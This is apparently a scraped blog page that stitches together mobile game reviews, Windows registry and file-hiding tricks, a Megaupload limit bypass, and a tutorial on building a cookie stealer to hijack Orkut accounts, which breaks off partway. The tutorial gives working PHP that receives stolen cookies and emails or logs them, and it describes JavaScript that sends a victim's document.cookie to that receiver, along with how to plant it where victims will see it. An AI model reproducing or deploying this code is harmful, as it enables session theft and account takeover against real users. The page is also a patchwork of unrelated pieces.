Guide Review - Game Review: 'Platinum Solitaire'

Solitaire is one of those mobile gaming standbys likeSnake or Tetris , which makes Gameloft’s update attempt risky. Luckily, Platinum Solitaire manages to be both classic and refreshing. It features six different solitaires: original, golf, pyramid, free cell, Yukon and spider. Each variant is interesting enough to have its own version, and the graphics and sound are top notch for a card game. The wager system, and the ability to unlock more casinos, adds to the flavor. Novice card players may be turned off by the high difficulty level in the later games – a successful game of spider can take more than a half-hour of deep concentration – but you can still progress by sticking with even one of the variants. All in all, an excellent road trip game.

                   PuzzleGeddon

As countless Hollywood sci-fi movies have proven over the years, the accepted way of invading a hostile planet usually involves high-tech weaponry, an armada of spaceships and a few thousand ruthless robotic soldiers to mop up the remnants of the opposing populace.

Puzzlegeddon adopts a slightly different approach. As in genre stablemate Puzzle Questyou subdue your opponent by linking together similarly-coloured blocks. Hardly the most fearsome method of obliteration we’ve come across, but it seems to work just as well.

The field of war is a 6x6 grid filled with blocks of four different shades: red, green, blue and yellow. Linking together five or more of these blocks and then pressing the fire button twice in quick succession removes them from the playing area and adds them to your resource reserves.

The caveat is that you’re not able to move individual blocks. Instead, you have to shift entire rows, both vertically and horizontally. This makes the game somewhat akin to a two dimensional version of a Rubik’s Cube, with each movement requiring careful consideration, lest you move one row and accidentally mess up your carefully arranged link-ups.

Combat in Puzzlegeddon is reliant on you accruing as many of the four coloured resources as possible. Each colour relates to a different ability - for example, red blocks boost your attacking resource which, when it's at a certain level, allows you to launch deadly missiles against your enemy.

Green, on the other hand, grants defensive options. Should you find yourself under attack by a rocket, you can launch a counter attack which will knock the hostile bird out of action before it can do any harm.

Yellow is all about disrupting your enemy’s plans. Using this ability you can briefly jam their early warning systems and prevent them from seeing your missiles until it’s too late to launch a counter strike, or - even better - prevent them from launching any missiles at all for a short period of time.

Finally, there's the blue power, which is all about boosting your existing abilities - improved missile attacks and better defensive capabilities are just two such options.

You don’t get all of these choices from the outset, however. During the Campaign mode, you’ll find that they become available as you progress, as do other playable characters and additional game modes, such as objective-led challenge levels and special one-on-one duels with CPU rivals.

It’s difficult to find fault with Puzzlegeddon. The concept is solid, the execution is perfect and the depth is considerable. If we were to pick up on one glaring deficiency it would be the absence of a multiplayer mode.

The game originated on PC and naturally came pre-packed with such a feature. It’s a crying shame that it’s been removed for this mobile release because it’s obvious that the game has been constructed with competitive play in mind.

Still, Puzzlegeddon is arguably more at home on a portable device than it was on the PC. The engaging gameplay and plethora of different game modes make this the kind of mobile entertainment you’d gladly wage interstellar war to partake in.

           World Snooker Championship 2009 3D

Big break, a bit broken

Product: World Snooker Championship 09 | Publisher: I-play | Format: Mobile |Genre: Sports | Players: | File size: 623KB | Reviewed on: N95 8GB other handsets | Version: Europe

In any sport, the question of just when you're too old to compete is one that shadows any professional's career. When the simplest of tasks become an ordeal and even making your way around whatever arena you're playing in is a juddering mess, the chances are, you've been playing too long.

By that reckoning, if World Snooker Championship 09 was a real snooker player, it'd be a talented veteran who often turns up for competitions drunk, his formerly prodigious potting technique only manifesting itself sporadically.

This is very much a series that appears to have taken a backwards step, botching up areas it previously had nailed and failing to captialise on the promising features it had in World Snooker Championship 2008 (3D).

While it comes with everything you might expect from a licensed title – real players and a focus on competing in championships – the actual engine behind the game stuttered and spluttered all over the place on the N95 8GB we reviewed the game on (we also got far from stellar results with an N81 build), playing like it was in slow motion in places and even crashing when things got heated.

The matches themselves are, on the surface, fairly routine affairs. In career mode, moving forward from round to round is a question of winning the most frames – initially the best of three. WSC 09's shot guide can be switched on or off (giving a neat, if short, preview of both where the cue ball and coloured ball should end up), as can the fairly unnecessary and almost uniform 3D player models that only appear to take the actual shot.

Aiming is handled with the '4' and '6' keys, while the power of the shot is assigned to '2' and '8', the former increasing the force used on the cue ball as highlighted by a handy gauge. Tapping '*' lets you choose a specific point on the cue ball to target, and you can also pan around the entire table with the '3' key, making sure you can check out every option available rather than being rooted to the spot. As far as replicating the actions available in a snooker match, WSC 09 doesn't put a foot wrong.

It's the actual taking of the shot itself that most debilitates I-play's third crack at championship snooker. Everything seems to happen a second or so after tapping the keys, the 3D engine whirring into action at the very opposite of what you might term O'Sullivan pace, panning around the table with a jerkier motion than a learner driver after one too many Red Bulls.

General twitching, while annoying, could normally be tolerated, but it's these very convulsions that make aiming your shots so difficult, the irregular nature of casting the camera around the table meaning you can spend many a minute fiddling with the view, only for WSC 09 to pan right past your intended angle with the slightest touch.

In the end, while this rarely affects simple pockets, it can hit the 50-50s, turning a match against you because you miss a risky shot that ultimately should have been put away.

Naturally, your competition – Murphy, Ebdon, O'Sullivan and co – isn't inclined to let you get away with such mistakes, usually capitalising on your errors and clearing the board to rack up their own points.

It's odd, because none of these problems were evident in the previous edition. Ultimately, while this is a fairly comprehensive snooker sim, with a decent upgrade system (tracking your play and upping your skill-set after an impressive shot) and Challenges mode (essentially consisting of a series of trick shots), World Snooker Championship 2009's felt is just a little too lumpy to do the sport it tries so hard to replicate justice

Bypass Megaupload country slot limit without toolbar, extension

Internet users who live in a country outside the United States would usually get limited country slot error when trying to download files from Mega upload. Mega upload requires the visitors to install the Alexa tool bar to proceed downloading and it will be quite troublesome if we’re using public computer or prefer not to install information gathering software like the Alexa Tool bar. There are several ways to solve this either by using US based proxy or by applying some tweaks to your computer/internet browser which is the most effective method this time. Those tweaks are:

Mozilla Firefox 2.0.0.5 tweak:

1. Go to address bar and type about:config . Press enter

2. Look for general.useragent.extra.firefox using the filter and double click on it

3. Change the default text with this: Firefox/2.0.0.5 MEGAUPLOAD 1.0

Windows Registry tweak (for Internet Explorer 7 and Internet Explorer 6):

1. Open run in the start menu and type regedit. Press enter.

2. in Registry Editor window, go to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Setting\5.0\User Agent\Post Platform]

3. Right click on ‘Post Platform’ and add new string value. Enter “Alexa Toolbar”. Save the registry and restart your computer.

Note: For IE 7.0 the “Post Platform” will be located at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

I have Tested it and working. Just try this trick

Make Windows XP Shutdown Faster than ever

You can make your shut down process a bit faster by the following tweak.

Steps: (download the registry file)

1. This step is very important.
Export (right click > Export) the following keys and save it to a safer place.

HKEY CURRENT USER\Control Panel\Desktop
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

2. Open Notepad, copy and paste the following to the Notepad.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"WaitToKillAppTimeout"="2000"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="2000"

3. Save the file and close Notepad.

4. Change extension of the file from .txt (text file) to .reg (registry file).

5. Double click open this file and click Yes and the OK .

Hide files using Winrar and an JPG image

By using this trick, you can hide your files in a rar file, but it looks like a picture.

For this you need Winrar and a Picture to show instead the hidden file.

Steps:

1. Make a New Folder in any one drive, rename it to HIDDEN (you can put name of your wish).
Let it be in C drive, so that its address is C:\HIDDEN\

2. Copy all your secret files to that folder.
Select all the files.
Right click and select "Add to HIDDEN.rar" , here HIDDEN is the name that you gave to that folder created in first step.

3. Delete all files, except the created HIDDEN.rar file.

4. Copy an image to that folder. Let its name be taken as pic.jpg. This picture is used to hide the Winrar file that we made.

5. Now open Command Prompt. (Start > Run > cmd )

6. Change the prompt to C:\HIDDEN\ .
To do that, in cmd, first type cd c:\HIDDEN\ (works only if that folder is in windows (C:) drive).
If that folder is created in other drive like D:, then firts type D: ad press enter, then type cd D:\HIDDEN\.

7. Now type the following:
COPY /b pic.jpg + hidden.rar picture.jpg

8. That creates a picture that looks same as pic.jpg in HIDDEN folder.
This picture.jpg contains all your files.

To get your rar file, just change the extension .jpg of picture.jpg to .rar , and open it.
To hide, change the extension back to .jpg

How to make cookies and hack Orkut accounts

How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.

First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.

Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).

There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site
